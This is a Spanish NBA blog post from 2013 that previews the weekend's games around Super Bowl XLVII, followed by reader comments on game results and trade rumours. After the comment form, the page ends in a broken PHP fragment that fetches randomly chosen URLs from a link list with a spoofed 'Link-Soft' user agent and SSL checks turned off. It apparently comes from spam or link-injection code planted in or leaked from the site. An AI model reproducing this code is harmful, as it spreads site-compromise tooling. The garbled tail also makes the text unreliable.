Fin de semana: …y de postre, la Super Bowl

01 de February de 2013 por MagicJohnson32

En los Estados Unidos y para los seguidores de la NFL, este fin de semana es el de la Super Bowl, algo que en términos NBA se traduce en una jornada de domingo corta y tempranera. Vayamos paso a paso en nuestro repaso del calendario de partidos de los tres próximos días, con un total de 27 encuentros antes de que los 49ers le toquen la carita a los Ravens el domingo a partir de las 00h30 en el Superdome de New Orleans.

Quedáis invitados a participar en esta suerte de crónica colectiva (es decir: vosotros hacéis el trabajo mientras nosotros descansamos) del fin de semana NBA.

VIERNES

Una docena de partidos jalonarán la madrugada del viernes, con la mirada de los aficionados españoles en el Lakers @ T’Wolves que Cuatro emitirá en directo (3h30). Dwight Howard es duda y Gasol puede encontrarse ante la oportunidad de reivindicarse como titular. Destaca del resto de la jornada el Heat @ Pacers, con todo el aroma de Playoffs del Este. Se disputará a la 1h00, igual que el Clippers @ Raptors, en el posible retorno de Bargnani y Valanciunas pero aun sin Rudy Gay para los canadienses y probablemente sin Chris Paul para los californianos. Cinco partidos arrancarán a la 1h30: Bulls y Bucks viajan a NY para enfrentarse a Nets y Knicks respectivamente, los Celtics buscarán el 50% de victorias sin Rondo ante unos Orlando Magic sin Glen Davis, los Kings visitarán Philadelphia, y Detroit, sin Tayshaun Prince en plantilla por primera vez desde el Pleistoceno, recibirán a los Cavs. El debut de Calde como jugador de los Pistons tendrá que esperar hasta que se completen los trámites del traspaso. Así, tampoco jugará Prince cuando Memphis se enfrentará a los Wizards (2h00), y muchos necesitaremos verlo con otra camiseta para acabar de hacernos a la idea de que ya no es un Piston.

Finalmente, antes del Lakers-Wolves, tres enfrentamientos entre equipos del Oeste se iniciarán a las 3h00: Mavs @ Suns (sin Nowitzki), Hornets @ Nuggets y un partido con implicaciones importantes en la carrera por los Playoffs entre Blazers @ Jazz, que la noche siguiente volverán a verse las caras en Portland.

SÁBADO

Lo dicho: Jazz @ Blazers jugarán la segunda parte de su back-to-back particular a las 4h00. Otro duelo teóricamente equilibrado, el Bulls @ Hawks, abrirá la noche a la 1h00, seguido por el Thunder @ Cavs y Kings @ Knicks a la 1h30. A partir de las 2h00, los Rockets tratarán de mantener su línea ascendente en casa ante los Bobcats, mientras los futuros New Orleans Pelicans jugarán en Minnesota. Media hora más tarde se disputarán dos partidos con claro favoritismo local, Magic @ Bucks y Wizards @ Spurs. Lo mismo se puede decir del último partido de la madrugada, Suns @ Warriors (4h00), seguramente con Bogut de vuelta al quinteto y posiblemente sin Curry.

DOMINGO

Como es costumbre, ante la disputa de la final de la NFL, la NBA dispone una jornada matinal con un menú corto pero interesante, y nosotros que lo celebramos. Clippers y Lakers proseguirán sus Grammy Road Trips, que les mantendrán unos diez días más lejos de L.A., y a las 19h00 jugarán en Boston y Detroit respectivamente. Si no pasa nada raro, Calde debería estrenarse con su nueva camiseta ante Pau Gasol y los Lakers. El domingo por la tarde también veremos a Rudy Gay debutar como jugador de los Raptors recibiendo a los campeones. El Heat @ Raptors se iniciará a las 20h00.

Y, de postre, la XLVII Super Bowl (00h30) entre San Francisco 49ers y Baltimore Ravens.

Editado: finalmente parece que se han completado todos los trámites necesarios para que los jugadores implicados en los recientes traspasos entre Grizzlies, Pistons y Raptors hagan su debut en los partidos de la noche del viernes.

Comenta

63 comentarios a esta entrada

  1. franitis dice:
    #1

    Perdón, 2 arriba, no cinco…

      Citar

  2. Blade Petrovic dice:
    #2

    Pierce sentencia con triplazo a falta de 2 segundos!

      Citar

  3. franitis dice:
    #3

    TRIPLAZO DE PIERCE PARA CERRAR EL PARTIDO!!!

      Citar

  4. franitis dice:
    #4

    Qué dos domingos me han dado los Celtics… @Miami y @LAC dos finales de infarto… Green Pride total!!!

      Citar

  5. Pop dice:
    #5

    Vaya un último minuto más raro en el LAL-DET. Alucinante la manera de fallar de todo quisque.

      Citar

  6. Denise dice:
    #6

    Bueno…pues vamos con el resumen…

    Partido placido en la primera mitad de Lakers, con Pau y Clark anotando, y Bryant y Nash distribuyendo….el lunar Artest yendose la pinza, pero el partido lo tenían controlado, ya que los Pistons estaban a 6-8 puntos gracias a la buena labor de Monroe pero nunca daban la sensación de poder ponerse por delante.

    Llega el tercer cuarto, y un par de acciones buenas de Kobe anotando y asistiendo, unido al pesimo partido de Knight y Maxiell hace que los Lakers se pongan 18 puntos arriba (72-54) a 8 minutos del final del tercer cuarto…

    Pasan unos minutillos de intercambio de canastas, solicito a Lawrence Frank via blog TJNBA que meta a Drummond, un asistente suyo que estaba leyendo el blog en ese momento se lo dice y por fin mete a Drummond por Maxiell, y éste junto con Will Bynum que había reemplazado a Knight, revolucionan el partido, a Lakers le entra una pájara y se empiezan a acercar paulatinamente.

    Con D’Anthoni atontado y sin soluciones, Bynum se come a Lakers y además se suma a la fiesta Villanueva con un par de triples.
    A 3 segundos, con Lakers ganando de 1, Bynum falla un tiro que se sale de dentro, posteriormente Lakers tiene 2 tiros libres de Nash para sentenciar y el canadiense falla ambos (también Clark había fallado 2 previemante).

    Con 98-97 para Lakers a 1 segundo del final, Singler le tira desde la banda un alley-oop a Drummond, que le gana el salto facilmente a Pau, y NO anota porque los dioses no han querido.

    Conclusión, partido que Lakers ganan por suerte, y que les mantiene vivos en su lucha por playoffs. Mucho tienen que mejorar si quieren ganar a Nets, Celtics o Heat en sus proximos enfrentamientos.

    Los mejores, Gasol y Will Bynum.

      Citar

  7. Denise dice:
    #7

    franitis:
    Qué dos domingos me han dado los Celtics… @Miami y @LAC dos finales de infarto… Green Pride total!!!

    Viendo el Box-score 41-29 para Clippers el tema de los rebotes. Agujero céltico en la pintura.

    Pienso que Celtics entraran en Playoffs porque lo que tiene atrás (salvo Philly dependiendo si Bynum vuelve) es muy malo, pero a dia de hoy es carne de primera ronda por mucha raza y coraje que tenga la franquicia.

    ¿Alguien sabe como está Rose? A ver si pudiera al menos jugar los playoffs.

      Citar

  8. Denise dice:
    #8

    Hay rumores de que Clippers estan interesados en Garnett, lo que no aparece es que podrían ofrecer.
    Supongo que sería Bledsoe + Odom (expiring) o De Andre Jordan.

    Yo, por muy bueno que sea KG, con el contrato tan largo que le queda, los años que tiene y lo bien que van los Clippers, no tocaría nada en el equipo angelino.

      Citar

  9. Chipi dice:
    #9

    Al final no pude ver el final del partido, y menos mal, porque con estas tonterías de los Lakers estoy a un pasito de mandarlos al carajo y hacerme de los Warriors o los Pacers.

      Citar

  10. Jose Luis dice:
    #10

    Yo he visto en twitter Butler + Bledsoe por Garnett… no sé como lo veréis los Clippers.

      Citar

  11. Denise dice:
    #11

    Jose Luis: Yo he visto en twitter Butler + Bledsoe por Garnett… no sé como lo veréis los Clippers.

    Pues….no sé, overbooking en la posición de 4 para Clippers (Odom, Griffin y Garnett), y los Celtics aun se quedarían con menos pintura todavía. El trade mas convincente para ambos sería Bledsoe + expiring de Odom de 8 kilos.

      Citar

  12. Ruxixón dice:
    #12

    Si van con calma en la gerencia,el equipo que pueden tener los Pistons a dos años vista puede ser un auténtico lujo tras su último movimiento.Si deciden ir fuerte este verano pueden cagarla a medias,ya que podrían formar un equipo para PO pero no para cotas más altas.Vamos a ver qué deciden porque a la chita callando pueden estar ahí en lo alto otra vez.

    Por cierto,lo de Calde en esat ocasión se debió a que los domingos no están abiertas las oficinas para los visados,jaja.Así que aplazado su debut para el Madison esta noche.

      Citar

  13. Chipi dice:
    #13

    Pues al final ganaron los Ravens

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>